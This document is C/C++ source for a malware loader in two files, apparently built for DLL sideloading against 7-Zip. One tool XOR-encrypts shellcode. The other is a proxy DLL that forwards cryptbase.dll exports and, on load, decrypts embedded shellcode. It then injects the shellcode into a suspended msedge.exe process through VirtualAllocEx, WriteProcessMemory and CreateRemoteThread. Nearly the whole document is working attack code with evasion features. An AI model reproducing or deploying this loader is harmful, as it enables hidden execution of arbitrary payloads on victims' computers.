DLL Loader

// DLL Loader
// https://www.7-zip.org/download.html
// ===============================================================
// 1st file:

#include <iostream>
#include <fstream>
#include <vector>
#include <string>

// Function to XOR encrypt the buffer using the provided key
void xorEncrypt(std::vector<unsigned char>& buf, const std::string& key) {
    size_t keyLen = key.length();
    for (size_t i = 0; i < buf.size(); ++i) {
        buf[i] ^= key[i % keyLen];
    }
}

int main(int argc, char* argv[]) {
    if (argc < 4) {
        std::cerr << "Usage: " << argv[0] << " <input_shellcode> <xor_key> <output_file>" << std::endl;
        return 1;
    }

    std::string inputFile = argv[1];
    std::string key = argv[2];
    std::string outputFile = argv[3];

    // Open input shellcode file
    std::ifstream file(inputFile, std::ios::binary);
    if (!file) {
        std::cerr << "Error: Cannot open input file." << std::endl;
        return 1;
    }

    // Read the file into a buffer
    std::vector<unsigned char> buf((std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>());
    file.close();

    if (buf.empty()) {
        std::cerr << "Error: Input shellcode file is empty." << std::endl;
        return 1;
    }

    // XOR encrypt the buffer
    xorEncrypt(buf, key);

    // Write XORed shellcode to output file
    std::ofstream outFile(outputFile, std::ios::binary);
    if (!outFile) {
        std::cerr << "Error: Cannot create output file." << std::endl;
        return 1;
    }

    outFile.write(reinterpret_cast<char*>(buf.data()), buf.size());
    outFile.close();

    std::cout << "[+] Shellcode encrypted and saved to: " << outputFile << std::endl;

    return 0;
}

// ===============================================================
// 2nd File:

#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <thread>
#include <random>
#include "resource.h"

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(linker, "/export:SystemFunction001=C:\\Windows\\System32\\cryptbase.SystemFunction001,@1")
#pragma comment(linker, "/export:SystemFunction002=C:\\Windows\\System32\\cryptbase.SystemFunction002,@2")
#pragma comment(linker, "/export:SystemFunction003=C:\\Windows\\System32\\cryptbase.SystemFunction003,@3")
#pragma comment(linker, "/export:SystemFunction004=C:\\Windows\\System32\\cryptbase.SystemFunction004,@4")
#pragma comment(linker, "/export:SystemFunction005=C:\\Windows\\System32\\cryptbase.SystemFunction005,@5")
#pragma comment(linker, "/export:SystemFunction028=C:\\Windows\\System32\\cryptbase.SystemFunction028,@6")
#pragma comment(linker, "/export:SystemFunction029=C:\\Windows\\System32\\cryptbase.SystemFunction029,@7")
#pragma comment(linker, "/export:SystemFunction034=C:\\Windows\\System32\\cryptbase.SystemFunction034,@8")
#pragma comment(linker, "/export:SystemFunction036=C:\\Windows\\System32\\cryptbase.SystemFunction036,@9")
#pragma comment(linker, "/export:SystemFunction040=C:\\Windows\\System32\\cryptbase.SystemFunction040,@10")
#pragma comment(linker, "/export:SystemFunction041=C:\\Windows\\System32\\cryptbase.SystemFunction041,@11")

const char key[] = "Uoajs2@ahiushidasd";


// Enhanced debugging function with timestamp and process ID
void DebugLog(const char* msg, LPVOID ptr = nullptr) {
    SYSTEMTIME st;
    GetLocalTime(&st);
    printf("[%02d:%02d:%02d.%03d] [PID: %d] %s",
        st.wHour, st.wMinute, st.wSecond, st.wMilliseconds,
        GetCurrentProcessId(), msg);

    if (ptr) {
        printf(" [Pointer: 0x%p]", ptr);
    }
    printf("\n");
}

void PauseForDebug(const char* msg) {
    DebugLog(msg);
    std::cout << "Press Enter to continue...";
    std::cin.ignore();
}

void HexDump(const void* data, size_t size) {
    const unsigned char* p = (const unsigned char*)data;
    printf("Hex dump (%zu bytes):\n", size);
    for (size_t i = 0; i < size; ++i) {
        printf("%02X ", p[i]);
        if ((i + 1) % 16 == 0 || i == size - 1) {
            printf("\n");
        }
    }
}

void DecryptShellcode(BYTE* data, DWORD size) {
    //DebugLog("Starting shellcode decryption...");
    int keyLength = sizeof(key) - 1;

    //DebugLog("Shellcode before decryption:");
    HexDump(data, min(size, 32)); // Show first 32 bytes

    for (DWORD i = 0; i < size; i++) {
        data[i] ^= key[i % keyLength];
    }

    //DebugLog("Shellcode after decryption:");
    HexDump(data, min(size, 32)); // Show first 32 bytes
    //DebugLog("Shellcode decryption completed");
}

void InjectShellcodeIntoNotepad() {
    DebugLog("Starting shellcode injection process");

    // Create notepad.exe process suspended
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    if (!CreateProcess(L"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
        DebugLog("[!] Failed to create notepad process!");
        return;
    }

    DebugLog("Notepad.exe created successfully (suspended)");
    DebugLog("Notepad process information:", pi.hProcess);
    printf("  Process ID: %d\n", pi.dwProcessId);
    printf("  Thread ID: %d\n", pi.dwThreadId);
    PauseForDebug("Notepad process created - check with Process Explorer");

    HMODULE hModule = NULL;
    if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCTSTR)InjectShellcodeIntoNotepad, &hModule)) {
        DebugLog("[!] Failed to get module handle!");
        return;
    }
    DebugLog("Module handle obtained:", hModule);
    PauseForDebug("Module handle fetched - ready to access resources");

    // Find and load the resource
    DebugLog("Locating resource...");
    HRSRC resHandle = FindResource(hModule, MAKEINTRESOURCE(IDR_SHELL1), L"SHELL");
    if (!resHandle) {
        DebugLog("[!] Resource not found!");
        return;
    }
    DebugLog("Resource found:", resHandle);

    DWORD resSize = SizeofResource(hModule, resHandle);
    HGLOBAL resData = LoadResource(hModule, resHandle);
    void* resPtr = LockResource(resData);

    if (!resPtr || resSize == 0) {
        DebugLog("[!] Failed to load resource data!");
        return;
    }

    DebugLog("Resource loaded successfully");
    printf("  Resource size: %d bytes\n", resSize);
    printf("  Resource pointer: 0x%p\n", resPtr);
    PauseForDebug("Resource loaded - ready to process");

    // Allocate memory for shellcode
    BYTE* pShellcode = (BYTE*)VirtualAlloc(0, resSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (pShellcode == NULL) {
        DebugLog("[!] Memory allocation failed!");
        return;
    }

    DebugLog("Memory allocated for shellcode:", pShellcode);
    printf("  Allocation size: %d bytes\n", resSize);
    PauseForDebug("Memory allocated - ready to copy shellcode");

    // Copy resource data to allocated memory
    memcpy(pShellcode, resPtr, resSize);
    DebugLog("Shellcode copied to allocated memory");
    PauseForDebug("Shellcode copied - ready to decrypt");

    // Decrypt the shellcode
    //DebugLog("Starting shellcode decryption...");
    DecryptShellcode(pShellcode, resSize);
    //PauseForDebug("Shellcode decrypted - ready to inject");

    // Allocate memory in the notepad process
    LPVOID pRemoteShellcode = VirtualAllocEx(pi.hProcess, NULL, resSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteShellcode) {
        //DebugLog("[!] Failed to allocate memory in target process!");
        return;
    }

    DebugLog("Memory allocated in Notepad process:", pRemoteShellcode);
    printf("  Allocation size: %d bytes\n", resSize);
    PauseForDebug("Remote memory allocated - ready to write shellcode");

    // Write the decrypted shellcode into the allocated memory
    SIZE_T bytesWritten = 0;
    if (!WriteProcessMemory(pi.hProcess, pRemoteShellcode, pShellcode, resSize, &bytesWritten)) {
        //DebugLog("[!] Failed to write shellcode to Notepad process!");
        return;
    }

    DebugLog("Shellcode written to Notepad process");
    printf("  Bytes written: %zu/%d\n", bytesWritten, resSize);
    PauseForDebug("Shellcode written - ready to execute");

    // Create a remote thread in the notepad process to execute the shellcode
    DebugLog("Creating remote thread...");
    system("pause");
    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteShellcode, NULL, 0, NULL);
    if (!hThread) {
        //DebugLog("[!] Failed to create remote thread!");
        return;
    }

    DebugLog("Remote thread created successfully:", hThread);
    printf("  Thread ID: %d\n", GetThreadId(hThread));
    PauseForDebug("Remote thread created - shellcode executing");

    // Wait for the thread to complete (optional)
    DebugLog("Waiting for shellcode execution to complete...");
    //WaitForSingleObject(hThread, INFINITE);

    DWORD exitCode = 0;
    GetExitCodeThread(hThread, &exitCode);
    DebugLog("Shellcode execution completed");
    printf("  Exit code: 0x%08X\n", exitCode);

    // Clean up
    CloseHandle(hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    // Free local shellcode memory
    VirtualFree(pShellcode, 0, MEM_RELEASE);
    //DebugLog("Injection process completed successfully");
    //PauseForDebug("EXITing....");
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH: {
        DebugLog("DLL attached to process");
        //Sleep(12000);
        InjectShellcodeIntoNotepad();
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}